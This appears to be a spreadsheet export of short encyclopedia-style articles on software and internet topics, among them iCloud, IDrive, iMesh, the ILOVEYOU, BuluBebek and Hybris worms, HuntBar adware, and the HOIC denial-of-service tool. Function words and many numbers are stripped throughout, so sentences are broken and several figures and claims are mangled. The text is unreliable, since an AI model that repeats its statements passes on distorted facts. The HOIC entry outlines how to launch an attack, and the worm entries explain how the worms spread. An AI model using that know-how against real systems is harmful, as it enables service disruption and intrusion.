scan match tracks itunes music library, including tracks copied sources, tracks itunes store, customers repurchase said tracks. customers download 100,000 tracks kbit/s drm-free file format matches tracks supported audio file formats customers' itunes libraries, including alac mp3. customers also choice keep original copies stored computers replaced copies itunes store. music available itunes store uploaded download onto customers' supported devices computers; take storage customers' icloud's storage allowance. tracks stored higher quality lossless audio alac, original uncompressed formats, aiff, transcoded kbit/s drm-free format uploading customers' icloud storage account, leaving original higher quality local files original format.if user stops paying itunes match service, copies drm-free itunes store versions tracks already downloaded onto device kept, whether devices computers.from mavericks, itunes radio function available across devices, including integration music app, portable devices apple (2nd generation onwards), well inside itunes macintosh windows computers. included ad-free version subscribers itunes match service currently available australiathe streaming genius shuffle available current versions available itunes mac. january 2016, ad-free itunes radio discontinued therefore longer part itunes match. march 2014, itunes match available countries, itunes cloud available countries. iwork icloud during 2013 apple worldwide developers conference (wwdc) keynote speech, iwork icloud announced release time next version versions iwork later year. three apps macos form apple's iwork suite (pages, numbers, keynote), made available interface (named pages icloud, numbers icloud, keynote icloud respectively), accessed icloud website user's icloud apple login. they also sync user's macos versions app, them, icloud apple this allows user edit create documents web, using supported browsers: safari, chrome, microsoft edge. also means microsoft windows users access native –previously apple device– document editing tools, interface. photo stream photo stream service supplied basic icloud service allows users store recent 1,000 photos icloud servers days free charge. when photo taken device photo stream enabled, automatically uploaded icloud servers. from there, becomes available viewing saving rest user's photo stream-enabled devices. photo automatically removed server days becomes photo number 1,001 user's stream. photo stream installed windows desktop computer includes option photos permanently saved device. service also integrated apple allowing users view recent photos wirelessly hdtv. icloud photos icloud photos feature later yosemite (version 10.10) later, plus access. service stores user's photos, maintaining original resolution metadata. users access icloud photos supported devices photos available icloud photos icloud.com, helps limit amount local storage device needs store photos (particularly smaller storage capacities) storing lower-resolution versions device, user option keep some/all stored locally higher resolution. storage since introduction 2011, account free storage owners either device using later, using lion 10.7 later. users monthly additional storage total amount storage shared across devices icloud apple id.several native features icloud user's icloud storage allowance, specifically, backup restore, email, contacts, calendars. macs, users also store filetypes icloud folders choosing, rather storing locally machine. while photo stream uses icloud servers, usage come user's icloud storage allowance. this also true itunes match music content, even music sold itunes store gets uploaded icloud storage, count user's allowance. other apps optionally integrate storage user's icloud storage allowance. user's content counts part icloud storage allowance. apple keep permanent track every purchase user makes apple account, associating piece content user, means copy every store item needed kept apple's servers. items bought itunes store (music, music videos, movies, shows), apple books store (books), store (ios apps), uses service apple call itunes cloud, allowing user automatically, manually preferred, re-download previous purchases mac, device. downloaded streamed, provided user connected internet) itunes store content used across devices, however, apple books store store content downloaded macs syncing devices, devices (and respective apps) used read books. similarly, macos apps purchased store also linked apple purchased downloaded using apple also, user registers device, previously bought store content downloaded store servers non-store content icloud servers.audiobooks metadata fields non-apple purchased sources synced across devices (macos ios) inside apple books apps, metadata non-apple purchased books ebook format). there remains syncing mismatch types media, apple-purchased content non-apple purchased content remains effect icloud users. icloud drive icloud drive icloud's file hosting service, syncs files across devices running yosemite (version 10.10), windows later, plus online access icloud.com. users store kind file (including photos, videos, documents, music, apps' data) icloud drive access mac, ipad, iphone, ipod touch, windows single file maximum file size (earlier gb). this allows users start work device continue another device. default, users still storage free previously, expandable storage plans available increased size (current tiers: tb), altered monthly subscription payment options yearly ones offered previous mobileme service. icloud drive integrated files gives users access cloud local on-device storage, replaced standalone icloud drive app. messages icloud messages icloud feature 11.4 macos high sierra 10.13.5 keeps user's imessages texts stored cloud. private relay private relay, icloud+ feature currently beta, allows users browse safari privately, similar virtual private network. according apple, "regulatory reasons" prevent company launching private relay china, belarus, russia, colombia, egypt, kazakhstan, saudi arabia, south africa, turkmenistan, uganda, philippines. wikipedia editors globally could negatively affected using private relay, wikipedia blocks ranges addresses combat page vandalism hide email hide email available icloud+ users allows users mail safari generate temporary apple email addresses forward messages main email address. custom email domain custom email domains, icloud+ feature, allows users personalize email address custom domain name invite family members domain icloud mail accounts. criticism icloud criticized third-party developers bugs make features nearly unusable earlier versions macos, specifically core data icloud, storing syncing larger amounts data third-party apps users' devices. third-party developers reported changes implemented release mavericks (version 10.9) address icloud criticisms. name dispute icloud communications, telecommunications company arizona, sued apple june 2011 trademark infringement shortly apple announced icloud. lawsuit filed district court arizona demanded apple stop using icloud name unspecified monetary damages. icloud communications changed name clear digital communications august 2011 dropped lawsuit apple shortly thereafter. privacy apple's icloud service, including icloud drive device backups, provide end-to-end encryption, also known client-side encryption, without end-to-end encryption, users' information left unsecured remains easily accessible unauthorized persons. furthermore, apple reserves right admits scanning user data illegal content.in august 2014, rumored hackers discovered exploit involving find iphone service, potentially allowed attacker brute-force user's apple access icloud data. exploit later incorrectly rumored used part august 2014 leak large number private, nude photos celebrities synced icloud storage iphone. apple confirmed working enforcement agencies investigate leak. apple subsequently denied icloud service alleged exploit responsible leak, asserting leaks result targeted phishing attack celebrities. september 2014 cook, interviewed charlie rose, stated camera celebrity leaks icloud exploit all, rather celebrities phished targeted phishing trick login credentials.apple scanning icloud mail csam information starting 2019. august 2021, apple confirmed planned started scanning icloud photos reason. after receiving public backlash apple scanning private photos, apple announced collect input releasing functionality. china february 2018, apple announced icloud users china would data, including encryption data, servers called "云上贵州" located country comply local regulations. this raised concerns human rights activists claim used track dissidents. response, cook stated apple encryption "the every country world," including china.on june 2021, wwdc event, apple announced icloud's 'private relay' feature would work china regulatory reasons. also comparison file hosting services comparison online backup services comparison online music lockers cloud backup file hosting service references external links icloud official site information icloud apple.com</t>
  </si>
  <si>
    <t>Bundle Africa</t>
  </si>
  <si>
    <t>bundle africa, simply bundle social payment software allows users trade cryptocurrencies, send receive fiat, save dollars currencies.the bundle africa application helps users perform transactions using cryptocurrencies bitcoin, ether, busd, bnb.bundle africa founded yele bademosi (co-founder/ceo nestcoin founding partner microtraction) emmanuel babalola. history founding early years bundle launched august 2019 yele bademosi emmanuel babalola. developed within binance ecosystem. bundle africa remote-first company began startup inside binance. bademosi made debut director binance labs, crypto platform's venture arm, responsible creating africa's blockchain ecosystem, position held april 2020. financed well-known tech businesses crypto industry, including xend, yellowcard, bitsika, raise, mention few, gone achieve great success.bundle cash cryptocurrency social payments aimed driving crypto development continent making engaging, convenient use, inclusive africans. thousand downloads first four months following release, rating google play $4.5 million transaction volumes. bundle monthly transaction volume million 350,000 customers early years. bundle africa grew 650,000 users months, mostly networking, community marketing, well little marketing budget.bundle executed successful pre-seed campaign september 2019, raising $450k binance. 2020, african cash crypto incorporated innovative unique security features ensure crypto assets safe secure times.in 2021, company launched native token (bxd). 2021: bademosi resigns yele bademosi stepped bundle africa july 2021, intention exploring areas african crypto community require support outside traditional purchase currency trading, continuing drive adoption digital currency across africa many economic opportunities come emmanuel babalola, director binance africa, appointed take yele's role incumbent company.yele parted ways bundle africa friendly terms. pleased emmanuel would taking position went director binance labs made significant contributions blockchain ecosystem believes babalola perfect successor could wish for. services bundle africa teamed together feminist coalition female media network (tefem) offer educational vocational awards respective communities march 2022. this project created recognize international women's day. bundle also sponsored women pursue free udemy courses art, technology, entertainment. bundle africa announced launch webpage celebration second year anniversary. references external links official website</t>
  </si>
  <si>
    <t>IDrive Inc.</t>
  </si>
  <si>
    <t>idrive inc. technology company specializes data backup applications. flagship product idrive, online backup service available windows, mac, linux, (iphone ipad) android users. overview softnet corporation founded 1995 based calabasas, california, within angeles county.pro softnet corporation's initial product called ibackup, acquired idrive.com domain name defunct company i-drive around mid-2003.idrive products mentioned lifehacker, macworld, world, cnet, tech crunch, notebook review, magazine engadget.pro softnet corporation plagued patent infringement lawsuits spoken publicly drain company's resources. products idrive automated backup application runs windows, mac, android. once installed, users select folders files backed user-specified times. idrive offers incremental compressed backups users upload modified portions backup file, files also updated real time continuous backup option. users ability limit bandwidth usage backup process. previous versions file automatically retained idrive automatically delete backup data, even backup files deleted user's computer. users share files email, social media sites including facebook twitter, mobile phone application android, iphone windows phone. idrive allows user back data compatible devices single account. idrive application runs natively windows, osx, well several models devices made synology, qnap, netgear.idrive provides multiple data retrieval options. backup files accessed remotely internet browser idrive's client software. user wants access backup files, idrive ship backup files hard drive.files idrive stored using 256-bit encryption allowing optional user-defined must shared idrive, idrive claims permanently stored servers. idrive also provides activity reports, backup status reports shared file reports. idrivesync idrivesync allows user synchronize files across different devices. idrive portable idrive express idrive portable hard drive designed local backup. hard drive terabyte storage space runs 5,400 rpm. idrive lite idrive lite free application ios, blackberry android devices, allows users back contacts list online. users also restore backup contacts different devices, even devices different operating systems. idrive 2012, idrive released idrive evs, publicly available software development api. kit, includes built-in encryption command-line api, allows users create applications idrive's cloud storage services. idrive photos idrive photos subscription-based android devices allows users back photos phones. default, photos saved original resolution cloud storage.idriveconnect allowing users access google docs sitting regular folder computer.idrive endpoint cloud backup enterprise, service providers references</t>
  </si>
  <si>
    <t>IFolder</t>
  </si>
  <si>
    <t>ifolder open-source application, developed novell, inc., intended allow cross-platform file sharing across computer networks. ifolder operates concept shared folders, folder marked shared contents folder synchronized computers network, either directly computers peer-to-peer fashion server. this intended allow single user synchronize files different computers (for example work computer home computer) share files users (for example group people collaborating project). core ifolder actually project called simias. simias actually monitors files changes, synchronizes changes controls access permissions folders. actual ifolder clients (including graphical desktop client client) developed separate programs communicate simias back-end. history originally conceived developed pgsoft company taken novell 2000, ifolder announced novell march 2001, released june 2001 software package windows nt/2000 novell netware included forthcoming novell netware 6.0. also included ability access shared files browser.ifolder professional edition announced march 2002 released month later, added support linux solaris access support windows palm this edition also designed share files millions users large companies, increased reporting features administrators. 2003 ifolder codie award.on march 2004, purchase linux software companies ximian suse, novell announced releasing ifolder open source project license. they also announced open source version ifolder would mono framework effort ease development. ifolder released june 2005. march 2006, novell announced ifolder enterprise server open source. april 2009, novell released ifolder 3.7.2 included client 10.4 10.5 well windows vista client. addition improved client lineup version supports ssl, ldapgroup support, auto-account creation, ifolder merge, enhanced access administration. ifolder.com website completely redesigned references earlier versions.on 2009, novell released ifolder also comparison file hosting services comparison file synchronization software comparison online backup services references external links ifolder sourceforge installation procedure opensuse. opensuse recommended lineage sles installation procedure ubuntu debian installation procedure ubuntu 11.04 based official packages</t>
  </si>
  <si>
    <t>IGap</t>
  </si>
  <si>
    <t>igap free iranian instant messaging application smart phones personal computers. igap allows users interact exchange information text, image, video, audio types messages. igap also supports p2p-based voice calls internet.igap developed android, windows. open-source clients igap published source code android client github. however, back-end source code proprietary software. response supreme leader iran khamenei referred messenger personal website. mohammad-javad azari jahromi minister iran joined messaging application september 2017 order support local social networking. earlier, minister claimed support local messengers deputy minister. external links igap store igap google play references</t>
  </si>
  <si>
    <t>BuluBebek</t>
  </si>
  <si>
    <t>bulubebek virus computer worm first discovered october 2008. virus exceptionally widespread, rather infected small groups computers. related kenshin, doraemon, naturo viruses, virus infected computers various parts world. written high level programming language, known visual basic. virus size creates files computers infects, file file. history order prevent computer user recognizing threat removing system, scripts written prevent task manager opening disable registry tools. microsoft visual studio debugging tools also targeted script, making impossible certain drivers access information. unlike aggressive viruses, worm relatively benign computers manages infect. experts guess writers particular virus likely simply serves next purpose author worm. effects infection evident computer user files folders hidden view. this occur computer system flash media used machine. computer infections bulubebek virus spread internet like many viruses, primarily transmitted systems flash media drives. reason, virus thankfully remained relatively uncommon. systems infected pass worm access create files flash drive turn used another system. reason, remains important infected computer users remove offending files quickly possible. detection removal fortunately, major antivirus packages recognize bulubebek virus full system scan run. when occurs, antivirus software quarantine suspicious files notify computer user issue hand. user wishes bulubebek virus also removed infected system manually. order manually remove virus, computer user need disconnect internet temporarily disable system restore. point, alternative software program task manager used access running process memory. here, process killed permanently specialized script entered restore registry original condition infection occurred machine. also list computer worms list antivirus software references external links virus bulu bebek removal guide</t>
  </si>
  <si>
    <t>Bulli Bai case</t>
  </si>
  <si>
    <t>bulli case related online mock auction muslim women india. photos prominent muslim journalists activists uploaded bulli without permission auctioned virtually. like sulli deals, actually sell anyone, harassed humiliated women. removed internet platform github, hosted, following outrage app.the police investigating case, found creators identify "trads" (stands "traditionalists”), promote genocide minorities. background july 2021 several muslim women pictures posted twitter "deal day". after several accounts started speaking sulli deals hosted github "open-source project." after multiple complaints, github took suspended "sulli deals" account hosted app. delhi police investigated matter make arrests sulli deals case 2021. january 2022 delhi police claimed arrested creator sulli deals indore madhya pradesh. incident reportedly january 2022, github pages site launched subdomain "bullibai.github.io" contained allegedly doctored pictures numerous indian women includes journalists, social workers, students famous personalities, accompanied derogatory content. these pictures reportedly taken respective social media accounts edited uploaded website auction without consent. women muslims. github page user account launched since removed github following complaints objectionable content. accused according police investigating case, four accused reported influenced hindu right-wing ideology. police linked creators alt-right groups inspired neo-nazism. members groups call "trads", short traditionalists. these groups promote rhetoric genocide muslims, dalits, sikhs indian minorities. creators used sikh religion names mislead people. according mumbai police, could caused religious enmity violence. march 2022, delhi police filed charge sheet, charging accused persons offenses including section 153a (promoting enmity groups), section 153b (causing disharmony), 354a(3) (sexual harassment), (insulting modesty woman) indian penal code.on march, court granted bail alleged creating apps, humanitarian grounds adding accused "first-time offender". reactions journalist body, editors guild india released statement taking note incident stated, "though enforcement agencies arrested supposedly behind apps, need investigation ensure behind despicable acts, even beyond arrested, brought justice."on january 2022, united nations special rapporteur minority issues, fernand varennes, said, "minority muslim women india harassed ‘sold’ social media apps, #sullideals, form hate speech, must condemned prosecuted soon occur. human rights minorities need fully equally protected". references</t>
  </si>
  <si>
    <t>Bulk email software</t>
  </si>
  <si>
    <t>bulk email software software used send emails large quantities. bulk email software usually refers standalone software, bulk email sending web-based services well. computer worms spread email example bulk email software, sometimes referred mass mailer. such worms usually (but necessarily) send spoofed "from" headers. types software most bulk email software programs hosted third party companies sell access system. customers send fixed monthly rate user account manage contacts send email campaigns. generally advantage type program reliability third party vendor application. some bulk email software programs self-hosted. customer buys license develops program hosts program. generally advantage type program lack ongoing monthly fees owner/developer program. disadvantage using option delivery rate reduced often users server send bulk emails. there various settings tweak avoid server labeled spam. references</t>
  </si>
  <si>
    <t>Browser synchronization</t>
  </si>
  <si>
    <t>browser synchronization (often simply called sync) free cloud service provided browser vendor sharing settings data across multiple installs. this typically used maintain consistent browser setup multiple devices. user must logged-in account sync browser. comparison these items synchronized browsers provide service. notable exception chromium builds longer google chrome sync. references</t>
  </si>
  <si>
    <t>ILOVEYOU</t>
  </si>
  <si>
    <t>iloveyou, sometimes referred love love letter you, computer worm infected million windows personal computers 2000. started spreading email message subject line "iloveyou" attachment "love-letter-for-you.txt.vbs." time, windows computers often latter file extension ("vbs," type interpreted file) default extension file type windows knows, leading unwitting users think normal text file. opening attachment activates visual basic script. first, worm inflicts damage local machine, overwriting random files (including office files image files; however, hides files instead deleting them), then, copies addresses windows address book used microsoft outlook, allowing spread much faster previous email worm.onel guzman, then-24-year-old resident manila, philippines, created malware. because laws philippines making malware time creation, philippine congress enacted republic 8792, otherwise known e-commerce law, july 2000 discourage future iterations activity. however, constitution philippines bans post facto laws, guzman could prosecuted. creation iloveyou created onel guzman lto3, college student manila, philippines, years time. guzman, poor struggling internet access time, created computer worm intending steal users' passwords, could internet accounts without needing service. justified actions belief internet access human right actually stealing.the worm used principles guzman described undergraduate thesis computer college. stated worm easy create, thanks windows would code email attachments user clicked them. originally designing worm work manila, removed geographic restriction curiosity, allowed worm spread worldwide. guzman expect worldwide spread. description machine system level, iloveyou relied scripting engine system setting (which runs scripting language files .vbs files) enabled took advantage feature windows file extensions default, malware authors would exploit. windows would parse file names right left, stopping first period character, showing elements left this. attachment, periods, could thus display inner fake "txt" file extension. true text files considered innocuous incapable running arbitrary code. worm used social engineering entice users open attachment (out actual desire connect simple curiosity) ensure continued propagation. systemic weaknesses design microsoft outlook microsoft windows exploited allow malicious code capable gaining complete access operating system, secondary storage, system user data simply unwitting users clicking icon. spread messages generated philippines began spread westwards corporate email systems. because worm used mailing lists source targets, messages often appeared come acquaintances therefore often regarded "safe" victims, providing incentive open them. only users site access attachment generate millions messages crippled mail systems overwrote millions files computers successive network. impact worm originated pandacan neighborhood manila philippines 2000, thereafter following daybreak westward across world employees began workday friday morning, moving first hong kong, europe, finally united states. outbreak later estimated caused us$5.5–8.7 billion damages worldwide, estimated cost us$10–15 billion remove worm. within days, fifty million infections reported, estimated internet-connected computers world affected. damage cited mostly time effort spent getting infection recovering files backups. protect themselves, pentagon, cia, british parliament large corporations decided completely shut mail systems. time, world's destructive computer related disasters ever.the events inspired song "e-mail" shop boys' top-ten album 2002, release, lyrics play thematically human desires enabled mass destruction computer infection. architecture guzman wrote iloveyou script (the attachment) microsoft visual basic scripting (vbs), microsoft outlook enabled default. script adds windows registry data automatic startup system boot. worm searches connected drives replaces files extensions jpg, jpeg, vbs, vbe, jse, css, wsh, sct, doc, hta, mp2, copies itself, appending additional file extension vbs. however, mp3s sound-related files would hidden rather overwritten.the worm propagates sending copy payload entry microsoft outlook address book (windows address book). also downloads barok trojan renamed occasion "win-bugsfix.exe."the fact worm written allowed users modify user could easily change worm replace essential files destroy system, allowing variations iloveyou spread across internet, different kinds damage. most variations file extensions affected worm. others modified email subject target specific audience, like variant "cartolina" italian "babypic" adults. some others changed credits author, initially included standard version virus, removing entirely referencing false authors. still, others overwrote "exe" "com" files. user's computer would unbootable upon restarting. some mail messages sent iloveyou: virus alert!! important! read carefully!! investigation 2000, young filipino programmers named reonel ramones onel guzman became targets criminal investigation agents philippines' national bureau investigation (nbi). local internet service provider internet reported receiving numerous contacts european computer users alleging malware form "iloveyou" worm) sent isp's servers.de guzman attempted hide evidence removing computer apartment, accidentally left disks behind contained worm, well information implicated michael buen possible co-conspirator.after surveillance investigation darwin bawasanta internet, traced frequently appearing telephone number ramones' apartment manila. residence searched ramones arrested placed investigation department justice (doj). onel guzman also charged absentia.at point, unsure felony crime would apply. suggested charged violating republic 8484 (the access device regulation act), designed mainly penalise credit card fraud, since used pre-paid stolen) internet cards purchase access isps. another idea charged malicious mischief, felony (under philippines revised penal code 1932) involving damage property. drawback elements, aside damage property, intent damage, guzman claimed custodial investigations might unwittingly released worm. press conference organised lawyer may, said possible" asked whether might done so.to show intent, investigated computer college, guzman dropped final year. they found that, undergraduate thesis, proposed implementation trojan steal internet login passwords. this, claimed, would allow users finally able afford internet connection. proposal rejected college computer studies board, leading guzman claim professors close-minded. aftermath since laws philippines writing malware time, ramones guzman released charges dropped state prosecutors. address legislative deficiency, philippine congress enacted republic 8792, otherwise known e-commerce law, july 2000, months worm outbreak.in 2012, smithsonian institution named iloveyou virulent computer viruses history.de guzman want public attention. last known public appearance 2000 press conference, obscured face allowed lawyer answer questions; whereabouts remained unknown years afterward. 2020, investigative journalist geoff white revealed researching cybercrime book crime com, found onel guzman working mobile phone repair stall manila. guzman admitted creating releasing virus. claimed initially developed steal internet access passwords, since could afford access. also stated created alone, clearing others accused co-writing worm. also christmas tree exec code worm computer virus nimda (computer worm) timeline notable computer viruses worms references external links love retrospect iloveyou virus lessons learned report, army forces command radsoft: iloveyou roundup 'sorry' love author" register cert advisory ca-2000-04 love letter worm</t>
  </si>
  <si>
    <t>IMesh</t>
  </si>
  <si>
    <t>imesh media file sharing client available nine languages. used proprietary, centralized, network (im2net) operating ports 1863. imesh owned american company imesh, inc., maintained development centers around world. 2009, third popular music subscription service us.imesh operated first "riaa-approved" service, allowing users residing united states canada download music content choice monthly form either premium subscription "togo" subscription. this subscription-based approach advocated theories open music model. third option also available users (residing either country) permanently purchase tracks cents (usd) each, without subscription. september 2013, website imesh hacked approximately accounts exposed. data later sale dark market website mid-2016 included email addresses, usernames salted hashes. shutdown june 2016, imesh shut service without prior notification. their top-level page changed read inform imesh longer available." their support page changed read "due changes music industry regret inform imesh longer available download, longer sell subscriptions music tracks." they posted facebook page: "after many years wonderful music, imesh longer available. thank listening stay tuned next adventure." multiple facebook users commented post express frustration contact friends made imesh social networking features. legal aspects riaa lawsuit september 2003 riaa (recording industry association america) sued imesh encouraging copyright infringement. imesh settled lawsuit little months later july 2004, according riaa, terms settlement imesh would us$4.1 million could continue operating normal (unlike grokster) implementing paid service (imesh 6.0). imesh first agreed service available 2004, pushed back towards 2005 technicalities. legality after relaunch, imesh advertised 100% legal client, acknowledged riaa. this downloads client limited select database million licensed songs videos.the imesh client (and later versions) achieved detecting attempts download copyrighted material blocking transfer acoustic fingerprinting, provided content protection company audible magic.an agreement mpaa also reached. video files size minutes length could longer shared imesh network, ensuring feature-length releases would transferred across network. references</t>
  </si>
  <si>
    <t>Hyper Text Coffee Pot Control Protocol</t>
  </si>
  <si>
    <t>hyper text coffee control protocol (htcpcp) facetious communication protocol controlling, monitoring, diagnosing coffee pots. specified 2324, published april 1998 april fools' rfc, part april fools prank. extension, htcpcp-tea, published 7168 april 2014 support brewing teas, also april fools' rfc. protocol 2324 written larry masinter, describes satire, saying "this serious purpose identifies many ways http extended inappropriately." wording protocol made clear entirely serious; example, notes "there strong, dark, rich requirement protocol designed espressoly [sic] brewing coffee". despite joking nature origins, perhaps protocol remained minor presence online. editor emacs includes fully functional client side implementation number reports exist complaining mozilla's lack support protocol. years publication htcpcp, web-controlled coffee consortium (wc3) published first draft "htcpcp vocabulary rdf" parody world wide consortium's (w3c) "http vocabulary rdf".on april 2014, 7168 extended htcpcp fully handle teapots. commands replies htcpcp extension http. htcpcp requests identified uniform resource identifier (uri) scheme coffee corresponding word listed languages) contain several additions http methods: also defines error responses: save movement august 2017, mark nottingham, chairman ietf httpbis working group, called removal status code "i'm teapot" node.js platform, code implemented reference original "i'm teapot" established hyper text coffee control protocol. august 2017, nottingham requested references "i'm teapot" removed programming language subsequently python's requests asp.net's httpabstractions library well. response, 15-year-old developer shane brunswick created website, save418.com, established "save movement", asserting references "i'm teapot" different projects serve reminder underlying processes computers still made humans". brunswick's site went viral hours following publishing, garnering thousands upvotes social platform reddit, causing mass adoption "#save418" twitter hashtag introduced site. heeding public outcry, node.js, python's requests, asp.net's httpabstractions library decided removing "i'm teapot" respective projects. unanimous support aforementioned projects general public prompted nottingham begin process marked reserved http status code, ensuring replaced official status code foreseeable future. october 2020, python released updated http library including im_a_teapot status code. corresponding pull request, save movement directly cited support adoption. usage around time 2021-2022 russo-ukrainian crisis, russian military website mil.ru returned http status code accessed outside russia ddos attack protection measure. change first noticed december 2021. also trojan room coffee internet things list http status codes client errors references external links google's demo page: error (i'm teapot)!? package teapot htcpcp-tea implementation david skinner error418.net</t>
  </si>
  <si>
    <t>CEG TEK International</t>
  </si>
  <si>
    <t>international (formerly copyright enforcement group) angeles-based copyright monetization firm. company also conducted released studies unauthorized distribution motion pictures, music, forms digital media.ceg international primarily represented motion picture studios, including image millennium films, protected digital content online. company monitored file sharing. electronic notices sent internet service providers customers, offered release liability exchange settlement amount. international claimed users paid infringement less likely share illegal content future. controversy claimed tek's activities could classified copyright trolling. references external links official website</t>
  </si>
  <si>
    <t>Hybris (computer worm)</t>
  </si>
  <si>
    <t>hybris (also known snow white, vecna.22528, full moon) computer worm believed written brazilian virus writer vecna, member computer virus writing group 29a. first appeared september 2000 became common january 2001. hybris typically comes email appears hahaha@sexyfun.net. malicious "plug-ins" enhanced hybris's functionality include various e-mail types. other plugin functionalities include spinning "wheel hypnosis." name hybris originates text within virus: "hybris" "(c) vecna". external links f-secure description cert: open mail relays used deliver "hybris worm" register: "vandals behind spread hybris worm named"</t>
  </si>
  <si>
    <t>HuntBar</t>
  </si>
  <si>
    <t>huntbar, wintools adware.websearch, installed activex drive-by download affiliate sites, advertisements displayed spyware programs example spyware install spyware. these programs toolbars internet explorer, track aggregate browsing behavior, redirect affiliate references, display advertisements. huntbar spyware information this hijacker application. hijackers take control browser's settings, usually change homepage, search page default pages point sites owned hijacker. since hijackers make money based number visits sites, benefit forcing view sites time browser opens. hijackers normally damage computer steal personal information. size: 1,532,928 bytes threat level: author: first cash reserve, appeared: variants april, 2003 february, 2004 detections: 6,803,305 references</t>
  </si>
  <si>
    <t>Hesiod (name service)</t>
  </si>
  <si>
    <t>computing, hesiod name service originated project athena (1983–1991). uses functionality provide access databases information change infrequently. unix environments often serves distribute information kept /etc/passwd, /etc/group, /etc/printcap files, among others. frequently ldap server used distribute kind information hesiod does. however, hesiod leverage existing servers, deploying network fairly easy. unix-like system users usually line /etc/passwd file local user like: this line composed seven colon-separated fields hold following data: user login name (string); password hash shadow password file (string); user (unsigned integer); user's primary group (unsigned integer); gecos field (four comma separated fields, string); user home directory (string); user login shell (string).this system works fine small number users small number machines. users start using machines information managed location becomes critical. this hesiod enters. instead information stored every machine, hesiod stores records server. then client query server information instead looking locally. bind records user might look something like: foo.passwd.ns.example.net "foo:x:100:10:foo bar:/home/foo:/bin/sh" 100.passwd.ns.example.net "foo:x:100:10:foo bar:/home/foo:/bin/sh" 100.uid.ns.example.net "foo:x:100:10:foo bar:/home/foo:/bin/sh" there three records system needs able access information different ways. first line supports looking user login name second allow look information user's uid. note class instead might expected. domain name system special class service hesiod's purpose. client side configuration also needs happen. /etc/hesiod.conf file setup might look something like: rhs=.example.net lhs=.ns classes=hs,in /etc/resolv.conf file uses name servers hesiod records. then what happens passwd combined values /etc/hesiod.conf file create fully qualified name foo.passwd.ns.hesiod. server queried entry returns value record. also name service switch (nss) network information service (nis) lightweight directory access protocol (ldap) kerberos references external links hesiod.conf(5) netbsd file formats manual single sign-on system administrator</t>
  </si>
  <si>
    <t>CCSO Nameserver</t>
  </si>
  <si>
    <t>ccso name-server protocol early form database search internet. common form used look information telephone numbers email addresses. today service largely replaced ldap. used mainly early-to-middle 1990s. name-server developed steve dorner university illinois urbana–champaign, university's computing communications services office (ccso). there also exists outlook plugin standalone application known outlookph. overview name-server directories frequently organized gopher hierarchies. tools "ph" "qi" components system: client queried server. protocol formally defined 2378 september 1998. however memo issued time references prior unspecified period time date (work protocol started around 1988, around 1991). defines sixteen keywords used server side define record properties. also defines clients access records server responses server give. server communication takes place port 105. command structure commands response initially assumed us-ascii encoding historical reasons, unless client explicitly asks 8-bit (iso-8859-1) encoding. result, characters 0x20 0x7e initially sent server form. other characters, present entries, escaped using 2045 defined "quoted-printable" encoding. initial request client text base keyword optionally followed parameters defined 2378. server responds request. following example response status request provided memo. status 100:qi server $revision: 100:ph passwords obtained ccso accounting, 100:1420 digital computer lab, 8:30 monday-friday. 100:be sure bring card. 200:database ready each command defined 2378 memo consists keyword followed needed parameters words. they separated spaces tabs line. each line must terminated cr+lf style. following commands: status this command takes parameters simply asks server report status above. siteinfo returns information server version mail domain contact password issues authentication methods. fields [field ...] list available entry fields server specified name names. information causes server specified information current user without login. [option[=value] ...] sets specified option server value. used without parameters lists current server settings. login [alias] logout this actual login/logout commands server alias must users alias. logging allows user change entry view certain fields flag restricted access. answer encrypted-response clear cleartext-password client normally uses send password information login command sent. quit exit stop recognized server session command closing connection. database distributed, nameserver backed flat file database. early 1990s, indiana university software developer larry hughes implemented version (called "phd") written perl backed relational database. that code distributed open-source license several years prior university's transition ldap. references external links lazar, michael (2019-03-31), file dump csso nameserver software, retrieved 2020-01-13 newer version windows ccso client: "application software windows win2k family networking programs". www.jumpjet.info. retrieved 2020-01-13. working servers 2020): from archived list ccso servers massachusetts institute technology, purdue university, university vermont university wisconsin madison: "phonebook server lookup (.)". 2003-02-07. archived original 2003-02-07. retrieved 2020-01-13. lazar, michael (2019-12-31), michael-lazar/ccso-nameserver, retrieved 2020-01-21 contains also list servers (accessible gopher http proxy) notable links university illinois publication nwu's site (user guides): "emailman(sm) servers". 2001-01-19. archived original 2001-01-19. retrieved 2020-01-13.</t>
  </si>
  <si>
    <t>High Orbit Ion Cannon</t>
  </si>
  <si>
    <t>high orbit cannon (hoic) open-source network stress testing denial-of-service attack application designed attack many urls time. designed replace orbit cannon developed praetox technologies later released public domain. security advisory hoic released prolexic technologies february 2012. development hoic developed conclusion operation payback hacktivist collective anonymous. operation payback concluded massive pressure group enforcement agencies, captured prosecuted individuals connected group. this forced many members group rethink strategies subsequently part group launched operation leakspin. however large part anonymous remained focused launching opt-in ddos attacks. however orbit cannon powerful enough launch attacks limited number users. hoic designed remedy ability cause http flood user agents required successfully launch attack, co-ordination multiple users leading exponential increase damage. hoic first tool kind support so-called "booster files", configurable vbscript modules randomize http headers attacking computers, allowing thousands upon thousands highly randomized combinations user agents. apart allowing user agents implement form randomization countermeasures booster files used increase magnitude attack. nomenclature hoic predecessor, loic, named cannon, fictional directed-energy weapon described firing beams ions space-based platform onto earth-based targets. although cannons appear many movies, television shows, video games science fiction-based setting, ones depicted command conquer series video games considered inspiration graphics software's website. simply described, hoic program sending http post requests computer attack, uses lulz-inspired graphical interface. hoic primarily performs denial-of-service (dos) attack ddos attack co-ordinated multiple individuals. denial-of-service (dos) attack target accomplished sending excessive traffic attempt overload site bring down. this basic version attack customized using booster files follow mixed .net syntax. addition, hoic simultaneously attack domains, making versatile tools hackers attempting co-ordinate ddos attacks group.the minimalist tool makes user friendly easy control. basic routine attack input website attacked, power option low, medium high. power option sets request velocity requests second, medium four high eight requests second. then booster file added uses .hoic extension define dynamic request attributes, launch attacks multiple pages within website help evade defense filters. attack launched pressing button labelled "fire lazer". limitations basic limitation hoic requires coordinated group users ensure attacks successful. even though allowed attacks launched fewer users older orbit cannon, hoic still requires minimum users launch effective attack required sustain target website protection. another limiting factor lack anonymizing randomizing capability. even though hoic should, theory, offer anonymizing booster files, actual protection provided enough. furthermore, anonymizing networks capable handling bandwidth attacks generated hoic. attempt launch attack using network actually harm network itself. however, anonymous members routinely proxy servers based sweden launch attacks. speculated notion sweden stricter internet privacy laws rest world. legality primarily, hoic designed stress testing tool lawfully used stress test local networks servers provided person initiating test authorization test long networks, servers, clients, networking equipment urls disrupted.hoic also used perform distributed denial-of-service attacks, illegal various statutes. police justice 2006 united kingdom amended computer misuse 1990, specifically outlawed denial-of-service attacks maximum penalty years prison. united states, denial-of-service attacks considered federal crime computer fraud abuse penalties include years imprisonment. 2013 criminal charges brought 